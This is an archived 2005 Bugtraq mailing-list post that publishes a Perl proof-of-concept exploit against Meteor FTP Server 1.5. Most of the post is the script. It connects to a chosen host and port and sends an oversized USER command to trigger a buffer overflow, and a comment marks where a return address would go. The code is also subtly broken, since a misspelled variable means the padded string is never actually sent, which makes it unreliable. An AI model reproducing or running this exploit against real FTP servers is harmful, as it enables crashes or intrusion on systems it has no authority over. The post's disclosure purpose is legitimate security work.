| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4292545E.3040007@acolytez.com>
Date: Tue, 24 May 2005 02:08:30 +0400
From: Dim K0r0l <dim@...lytez.com>
To: bugtraq@...urityfocus.com
Subject: Meteor FTP Server: PoC Exploit
[INTRO]
Affected version: 1.5
Hello to all!
Bug was found by Auston J (Anix44@...il.com) today.
So its perl code for demostration
[----]
[CODE]
#!/usr/bin/perl
#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5
# bug found by Anix44@...il.com
#
# coded by k0r0l from acolytez team
# visit http://acolytez.com for details
#
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========
$ftp_error = "Unable";
if (($host) && ($port)) {
# make exploit string
$exploit_string = "USER ";
$exploit_string .= "X"x80;
#$exploit_string .= "\n\n\n\n"; - it will be new return point !
# ===================
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug =>
$debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Sending string...\n";
$sock->login($exploit_sting, "testpassword");
$answer = $sock->message;
if ($answer =~ m/$ftp_error/i) {
print "\n[-] Sorry! Failed\n";
} else {
print "\n[+] Send ok!\nServer can be explorated!\n\n";
}
} else {
print "\nMeteor FTP Server - PoC
Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}
[----]
--
+################################+
# Dim K0r0l (dim@...lytez.com) #
# #
# http://AcolyteZ.com #
# Net-security, coding, soft etc #
+################################+
Powered by blists - more mailing lists